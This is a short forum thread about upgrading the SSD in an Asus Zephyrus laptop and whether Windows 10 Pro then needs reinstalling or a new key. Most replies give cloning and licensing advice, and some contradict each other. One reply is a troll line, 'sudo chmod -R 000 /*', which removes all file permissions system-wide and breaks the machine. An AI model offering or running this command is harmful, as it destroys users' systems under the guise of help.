upgrading an ssd in a laptop... Operating system?

Hello all! I currently have an Asus Zephyrus S GX531 Gs. I currently have one. 512gb ssd. I plan on replacing it with a 1tb m.2 ssd, will I need to reinstall the operation system? I actually upgraded to Windows 10 pro a while back and wondering if I would have to re-purchase or enter the cd- key again? Thanks!

You can clone your existing drive and extend the windows partition. You shouldn't need a new windows key.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

if you linked your current windows installation with a Microsoft account, you dont need to buy another key. you will however, need to reinstall windows.

make sure you have a backup

No linking also works, the key is embedded into the mobo
